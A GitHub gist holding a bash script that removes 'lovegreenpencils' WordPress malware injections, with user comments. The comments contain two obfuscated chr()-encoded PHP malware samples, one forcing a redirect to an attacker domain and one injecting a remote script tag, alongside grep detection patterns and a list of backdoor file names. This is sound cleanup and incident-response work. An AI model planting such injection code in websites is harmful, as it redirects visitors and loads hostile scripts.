-
-
Save black-dragon74/86fc18a91e814019228c02531f0ea01c to your computer and use it in GitHub Desktop.
#!/bin/bash | |
# Regex to fix DB is: "s/<script[\s\S]*?>[\s\S]*?<\/script>//g" | |
totalInfections=0 | |
filesProcessed=0 | |
echo "Welcome to lovegreenpencils malware fixer by black-dragon74" | |
echo "This fix is divided into 3 phases." | |
echo "Phase 1 fixes the \`beckup\` files." | |
echo "Phase 2 fixes the header injections." | |
echo "Phase 3 fixes the deep rooted JS PHP and JSON injections" | |
echo | |
# Begin phase 1 | |
read -p "Press any key to begin the phase 1: " yay | |
clear | |
echo "Scanning....." | |
for f in $(grep -ril "Element.prototype.appendAfter" ./*); do | |
# Don't fix the fixer itslef :D | |
if [[ $f == "./fix.sh" ]]; then | |
continue; | |
fi | |
# If a backup exists, we created it, don't process it again | |
if [[ $(echo $f | grep ".perlbak") ]]; then | |
continue; | |
fi | |
# Otherwise fix all files recursively | |
echo "Found file $f" | |
echo "Backing up and fixing the infection" | |
echo | |
perl -pi.perlbak -e 's/Element\.prototype\.appendAfter[\s\S]*?\}\)\(\);//gi' "${f}" | |
((filesProcessed ++)) | |
done | |
echo "Phase 1 complete. Processed $filesProcessed files." | |
((totalInfections += filesProcessed)) | |
filesProcessed=0 | |
# Begin phase 2 | |
read -p "Press any key to begin the phase 2: " yay | |
clear | |
echo "Scanning....." | |
for f in $(grep -ril "REQUEST\['lt'\]" ./*); do | |
# Don't fix the fixer itslef :D | |
if [[ $f == "./fix.sh" ]]; then | |
continue; | |
fi | |
# If a backup exists, we created it, don't process it again | |
if [[ $(echo $f | grep ".perlbak") ]]; then | |
continue; | |
fi | |
# Otherwise fix all files recursively | |
echo "Found file $f" | |
echo "Backing up and fixing the infection" | |
echo | |
perl -pi.perlbak -e 's/<\?php\ \$v[\s\S]*?\?>//gi' "${f}" | |
((filesProcessed ++)) | |
done | |
echo "Phase 2 complete. Processed $filesProcessed files." | |
((totalInfections += filesProcessed)) | |
filesProcessed=0 | |
# Begin phase 3 | |
read -p "Press any key to begin the phase 3: " yay | |
clear | |
echo "Scanning....." | |
for f in $(grep -ril "lovegreenpencils" ./*); do | |
# Don't fix the fixer itslef :D | |
if [[ $f == "./fix.sh" ]]; then | |
continue; | |
fi | |
# If a backup exists, we created it, don't process it again | |
if [[ $(echo $f | grep ".perlbak") ]]; then | |
continue; | |
fi | |
# Otherwise fix all files recursively | |
echo "Found file $f" | |
echo "Backing up and fixing the infection" | |
echo | |
perl -pi.perlbak -e "s/<script\ type=\'text\/javascript\'\ src=\'https:\/\/dock\.lovegreenpencils[\s\S]*?<\/script>//gi" "${f}" | |
((filesProcessed ++)) | |
done | |
echo "Phase 3 complete. Processed $filesProcessed files." | |
((totalInfections += filesProcessed)) | |
filesProcessed=0 | |
# Processing complete. | |
echo | |
echo "Found, backed up and fixed $totalInfections infected files." | |
read -p "Processing complete. Press any key to exit. " yay | |
exit 0 | |
Amazing thanks you =)
In my case I only change
update wp_options set option_value='http://yoursite.com' where option_name='siteurl';
update wp_options set option_value='http://yoursite.com' where option_name='home';
Be careful with that- this thing pops a lot of back doors and javascript down where it can.. it needs to be cleaned out entirely, as the site forwarding is the least malicious thing it does.
I have found a new variation that is getting injected into a couple hundred files. I attempted to download your tool and update it to the new variation I found but it seems like I am doing it wrong.
Here is the new variation:
<?php $a="h"."ea"."der";$a(chr(76).chr(111).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(105).chr(114).chr(99).chr(46).chr(108).chr(111).chr(118).chr(101).chr(103).chr(114).chr(101).chr(101).chr(110).chr(112).chr(101).chr(110).chr(99).chr(105).chr(108).chr(115).chr(46).chr(103).chr(97).chr(47).chr(53).chr(53).chr(114).chr(121).chr(101).chr(114).chr(121).chr(63).chr(105).chr(100).chr(61).chr(50).chr(50).chr(53).chr(56).chr(52).chr(38).chr(114).chr(115).chr(61).chr(50).chr(51).chr(52).chr(54));?>
Do you have cPanel on your hosting account ? If yes, you should have Terminal app to launch thoses commands
I’m trying to update the code to find the chr, but I’m not making it. Someone now how can add the new variation? I trying with this code.for f in $(grep -ril "\$a=chr.*>"); do
I’m trying to update the code to find the chr, but I’m not making it. Someone now how can add the new variation? I trying with this code.
for f in $(grep -ril "\$a=chr.*>"); do
Hello,
I wrote a post (in french) : https://www.vinvin.dev/piratage-de-site-wordpress-cas-des-redirections-lovegreenpencils/
Maybe u can use this : grep -ril '$a="h"."ea"."der"' ./*
to find the new variation ?
I’m trying to update the code to find the chr, but I’m not making it. Someone now how can add the new variation? I trying with this code.
for f in $(grep -ril "\$a=chr.*>"); do
Hello,
I wrote a post (in french) : https://www.vinvin.dev/piratage-de-site-wordpress-cas-des-redirections-lovegreenpencils/
Maybe u can use this :grep -ril '$a="h"."ea"."der"' ./*
to find the new variation ?
Thank you! I will try this.
If think I found the plugin that have the backdoor. Is a nuked version of elementor Pro
Usually, the hacker infect large amount of file. Beware and launch the grep command on root directory.
Check if you haven't file call "lte_" or something on the root then check if you haven't got any maintenance.php or maintenance folder or wp-sheeep on plugin folder also check if you don"t have wp-stream.php file on root as well.
The best thing I thinks once the cleaning done, its to export DB, Export uploads/ themes/ plugins/ and reinstall fresh WP.
I am seeing a trend of a new variation of char code being used.
<?php echo chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(32).chr(116).chr(121).chr(112).chr(101).chr(61).chr(39).chr(116).chr(101).chr(120).chr(116).chr(47).chr(106).chr(97).chr(118).chr(97).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(39).chr(32).chr(115).chr(114).chr(99).chr(61).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(111).chr(114).chr(101).chr(46).chr(100).chr(111).chr(110).chr(116).chr(107).chr(105).chr(110).chr(104).chr(111).chr(111).chr(111).chr(116).chr(46).chr(116).chr(119).chr(47).chr(100).chr(101).chr(115).chr(116).chr(105).chr(110).chr(97).chr(116).chr(105).chr(111).chr(110).chr(46).chr(106).chr(115).chr(63).chr(122).chr(61).chr(105).chr(38).chr(105).chr(100).chr(61).chr(49).chr(49).chr(50).chr(38).chr(99).chr(108).chr(105).chr(100).chr(61).chr(53).chr(49).chr(50).chr(38).chr(115).chr(105).chr(100).chr(61).chr(55).chr(56).chr(57).chr(54).chr(51).chr(52).chr(53).chr(39).chr(62).chr(60).chr(47).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(62); ?>
In my case I only change
update wp_options set option_value='http://yoursite.com' where option_name='siteurl';
update wp_options set option_value='http://yoursite.com' where option_name='home';